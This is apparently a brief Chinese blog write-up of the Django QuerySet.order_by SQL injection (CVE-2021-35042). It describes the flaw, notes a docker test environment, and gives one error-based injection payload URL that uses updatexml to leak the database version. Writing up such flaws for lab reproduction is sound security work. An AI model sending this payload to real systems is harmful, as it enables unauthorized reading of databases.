Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

相关推荐
麦聪聊数据5 小时前
业务自助取数(下):安全可控前提下,实现取数效率百倍提升
数据库·sql
ShiXZ2135 小时前
指令集-SQL 常用指令速查手册
数据库·sql·mysql·oracle
Databend8 小时前
小 Bitmap,大优化:Databend 如何加速大规模集合聚合
大数据·数据库·sql
Database_Cool_8 小时前
RAG 混合检索首选:阿里云 Lindorm 向量+全文一体化检索
数据库·阿里云·django·云计算
婉然从物12 小时前
Flink SQL 元数据持久化实战:从“每次重启表消失”到“Hive Metastore 永久存储”
hive·sql·flink
kali-Myon1 天前
某校园门禁系统高危 SQL 注入漏洞挖掘复盘
数据库·sql·安全·web安全
白露与泡影1 天前
慢 SQL 不一定是 SQL 慢:一次 MySQL 连接池耗尽的故障定位
数据库·sql·mysql
ruxshui1 天前
微服务下单跨服务数据不一致问题分析笔记
sql·微服务·架构
阿坤带你走近大数据1 天前
Oracle新老SQL写法对比
数据库·sql·oracle